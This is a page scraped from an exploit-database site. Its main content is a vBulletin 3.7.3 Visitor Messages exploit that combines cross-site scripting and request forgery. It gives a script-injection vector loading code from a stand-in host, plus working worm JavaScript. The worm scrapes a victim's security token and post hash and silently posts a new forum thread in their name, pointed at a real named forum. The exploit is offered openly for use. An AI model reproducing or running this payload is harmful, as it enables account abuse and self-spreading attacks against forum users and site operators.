0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
vBulletin 3.7.3 Visitor Message XSS/XSRF + worm Exploit
[=======================================================
vBulletin 3.7.3 Visitor Message XSS/XSRF + worm Exploit
=======================================================
/* -----------------------------
* Author = Mx
* Title = vBulletin 3.7.3 Visitor Messages XSS/XSRF + worm
* Software = vBulletin
* Addon = Visitor Messages
* Version = 3.7.3
* Attack = XSS/XSRF
- Description = A critical vulnerability exists in the new vBulletin 3.7.3 software which comes included
+ with the visitor messages addon (a clone of a social network wall/comment area).
- When posting XSS, the data is run through htmlentities(); before being displayed
+ to the general public/forum members. However, when posting a new message,
- a new notification is sent to the commentee. The commenter posts a XSS vector such as
+ <script src="http://evilsite.com/nbd.js">, and when the commentee visits usercp.php
- under the domain, they are hit with an unfiltered xss attach. XSRF is also readily available
+ and I have included an example worm that makes the user post a new thread with your own
- specified subject and message.
* Enjoy. Greets to Zain, Ytcracker, and http://digitalgangster.com which was the first subject
* of the attack method.
* ----------------------------- */
function getNewHttpObject() {
var objType = false;
try {
objType = new ActiveXObject('Msxml2.XMLHTTP');
} catch(e) {
try {
objType = new ActiveXObject('Microsoft.XMLHTTP');
} catch(e) {
objType = new XMLHttpRequest();
}
}
return objType;
}
function getAXAH(url){
var theHttpRequest = getNewHttpObject();
theHttpRequest.onreadystatechange = function() {processAXAH();};
theHttpRequest.open("GET", url);
theHttpRequest.send(false);
function processAXAH(){
if (theHttpRequest.readyState == 4) {
if (theHttpRequest.status == 200) {
var str = theHttpRequest.responseText;
var secloc = str.indexOf('var SECURITYTOKEN = "');
var sectok = str.substring(21+secloc,secloc+51+21);
var posloc = str.indexOf('posthash" value="');
var postok = str.substring(17+posloc,posloc+32+17);
var subject = 'subject text';
var message = 'message text';
postAXAH('http://digitalgangster.com/4um/newthread.php?do=postthread&f=5', 'subject=' + subject + '&message=' + message + '&wysiwyg=0&taglist=&iconid=0&s=&securitytoken=' + sectok + '&f=5&do=postthread&posthash=' + postok + 'poststarttime=1&loggedinuser=1&sbutton=Submit+New+Thread&signature=1&parseurl=1&emailupdate=0&polloptions=4');
}
}
}
}
function postAXAH(url, params) {
var theHttpRequest = getNewHttpObject();
theHttpRequest.onreadystatechange = function() {processAXAHr(elementContainer);};
theHttpRequest.open("POST", url);
theHttpRequest.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=iso-8859-2');
theHttpRequest.send(params);
function processAXAHr(elementContainer){
if (theHttpRequest.readyState == 4) {
if (theHttpRequest.status == 200) {
}
}
}
}
getAXAH('http://digitalgangster.com/4um/newthread.php?do=newthread&f=5');
document.write('<iframe src="http://digitalgangster.com/4um/newthread.php?do=newthread&f=5">');
# 0day.today [2024-11-16] #